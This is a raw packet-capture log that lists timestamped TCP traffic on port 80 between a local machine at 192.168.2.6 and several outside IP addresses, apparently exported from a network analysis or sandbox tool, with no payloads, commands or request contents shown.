                                                                                                        Dec 2, 2024 14:38:06.522399902 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:06.713244915 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.732387066 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.852585077 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:07.852766991 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.869075060 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.989120007 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:07.989182949 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:09.194322109 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:09.244441032 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:09.277796030 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:09.277930975 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:09.385190010 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.404202938 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.524154902 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:10.524281979 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.534256935 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.654124975 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840359926 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840380907 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840395927 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840424061 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840436935 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840444088 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840455055 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840471983 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840590954 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.840636969 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.840642929 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840657949 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840707064 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.960932016 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.961016893 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.961225986 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.965095043 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.010128021 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.043262005 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.043298960 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.043472052 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.047386885 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.047450066 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.047713041 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.055819035 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.055926085 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.056041002 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.064513922 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.064614058 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.064718008 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.072669029 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.072797060 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.072910070 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.081089020 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.081237078 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.081332922 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.089462996 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.089484930 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.089595079 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.097754955 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.097820044 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.097912073 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.106323957 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.106400013 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.106515884 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.114588976 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.114696980 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.114798069 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.130255938 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.130322933 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.130465031 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.163657904 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.163806915 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.163940907 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.244482994 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.244602919 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.244726896 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.246877909 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.247050047 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.247186899 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.251919031 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.252027988 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.252136946 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.257253885 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.257482052 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.257601023 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.262164116 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.262326002 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.262435913 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.267357111 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.267386913 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.267494917 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.273106098 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.273130894 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.273257017 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.277643919 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.277673006 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.277777910 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.282747984 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.282851934 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.282983065 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.287753105 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.287866116 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.287972927 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.292911053 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.292989969 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.293087006 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.298069954 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.298125029 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.298213005 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.301867008 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.301996946 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.302095890 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.305692911 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.305773020 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.305867910 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.309571028 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.309673071 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.309779882 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.313505888 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.313568115 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.313653946 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.317166090 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.317212105 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.317325115 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.445844889 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.445883036 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.446037054 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.447431087 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.447489977 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.447566986 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.450551033 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.450654984 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.450766087 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.453702927 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.453902960 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.453991890 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.456880093 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.457190990 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.457299948 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.460020065 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.460141897 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.460242987 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.463243961 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.463301897 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.463385105 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.466749907 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.466787100 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.466939926 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.469552040 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.469573975 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.469683886 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.472649097 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.472769022 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.472872019 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.475781918 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.476018906 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.476100922 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.478955030 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.479084015 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.479165077 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.482101917 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.482245922 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.482358932 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.485261917 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.485450983 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.485536098 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.488445997 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.488518000 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.488604069 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.491586924 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.491724968 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.491832018 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.999269962 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.999304056 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.999327898 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.999402046 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.999414921 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.999429941 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.999459982 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.999507904 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:13.000781059 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:13.000835896 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:13.004682064 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:13.124521017 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:18.508707047 CET4991280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:18.628774881 CET8049912194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:18.628940105 CET4991280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:18.647104025 CET4991280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:18.767132998 CET8049912194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:20.003469944 CET8049912194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:20.003499031 CET8049912194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:20.003508091 CET8049912194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:20.003643036 CET8049912194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:20.003806114 CET4991280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:20.003806114 CET4991280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:20.161046028 CET4991280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:21.201375008 CET4991980192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:21.321397066 CET8049919194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:21.321486950 CET4991980192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:21.340894938 CET4991980192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:21.461014986 CET8049919194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:22.741286993 CET8049919194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:22.741344929 CET8049919194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:22.741354942 CET8049919194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:22.741359949 CET8049919194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:22.741439104 CET4991980192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:22.854505062 CET4991980192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:23.874411106 CET4992580192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:23.995722055 CET8049925194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:23.995973110 CET4992580192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:24.011362076 CET4992580192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:24.131565094 CET8049925194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:24.131577015 CET8049925194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:25.323488951 CET8049925194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:25.323520899 CET8049925194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:25.323528051 CET8049925194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:25.323537111 CET8049925194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:25.323599100 CET4992580192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:25.525732994 CET4992580192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:26.545280933 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:26.665887117 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:26.666023016 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:26.676837921 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:26.796750069 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045411110 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045439959 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045445919 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045483112 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045535088 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045542002 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045548916 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045617104 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:28.045681000 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:28.045686007 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045696974 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045737028 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:28.045782089 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:28.045830011 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:28.052835941 CET4993280192.168.2.6194.58.112.174
                                                                                                        Dec 2, 2024 14:38:28.172931910 CET8049932194.58.112.174192.168.2.6
                                                                                                        Dec 2, 2024 14:38:33.473968029 CET4994880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:33.593959093 CET8049948209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:33.594055891 CET4994880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:33.610939026 CET4994880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:33.730968952 CET8049948209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:34.909288883 CET8049948209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:34.909410000 CET8049948209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:34.909485102 CET4994880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:35.119527102 CET4994880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:36.138788939 CET4995680192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:36.258977890 CET8049956209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:36.259119034 CET4995680192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:36.276108027 CET4995680192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:36.402081013 CET8049956209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:37.534991980 CET8049956209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:37.535289049 CET8049956209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:37.535393000 CET4995680192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:37.791712046 CET4995680192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:38.810884953 CET4996280192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:38.931159019 CET8049962209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:38.931255102 CET4996280192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:38.949639082 CET4996280192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:39.069741964 CET8049962209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:39.069771051 CET8049962209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:40.199031115 CET8049962209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:40.199341059 CET8049962209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:40.199515104 CET4996280192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:40.463351011 CET4996280192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:41.483606100 CET4996880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:41.603877068 CET8049968209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:41.603971958 CET4996880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:41.615027905 CET4996880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:41.735064030 CET8049968209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:42.952363014 CET8049968209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:42.952374935 CET8049968209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:42.952516079 CET4996880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:42.957034111 CET4996880192.168.2.6209.74.64.187
                                                                                                        Dec 2, 2024 14:38:43.194057941 CET8049968209.74.64.187192.168.2.6
                                                                                                        Dec 2, 2024 14:38:48.563455105 CET4998580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:48.684015989 CET80499853.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:48.684819937 CET4998580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:48.700900078 CET4998580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:48.823086023 CET80499853.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:49.826834917 CET80499853.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:49.826931953 CET4998580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:50.213540077 CET4998580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:50.333651066 CET80499853.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:51.232770920 CET4999280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:51.354603052 CET80499923.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:51.354698896 CET4999280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:51.373893023 CET4999280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:51.494498968 CET80499923.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:52.740514040 CET80499923.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:52.740601063 CET4999280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:52.885188103 CET4999280192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:53.005175114 CET80499923.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:53.904083014 CET4999980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:54.024152994 CET80499993.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:54.024313927 CET4999980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:54.039807081 CET4999980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:54.160263062 CET80499993.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:54.160280943 CET80499993.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:55.123080969 CET80499993.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:55.123138905 CET4999980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:55.541553020 CET4999980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:55.661514044 CET80499993.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:56.560923100 CET5000580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:56.680895090 CET80500053.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:56.681042910 CET5000580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:56.692955017 CET5000580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:56.812906981 CET80500053.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:57.778453112 CET80500053.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:57.778565884 CET80500053.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:57.778717041 CET5000580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:57.781495094 CET5000580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:38:57.901398897 CET80500053.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:03.393888950 CET5001180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:03.514183998 CET80500113.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:03.514312983 CET5001180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:03.596259117 CET5001180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:03.716330051 CET80500113.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:04.698601961 CET80500113.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:04.698869944 CET5001180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:05.119615078 CET5001180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:05.361257076 CET80500113.33.130.190192.168.2.6
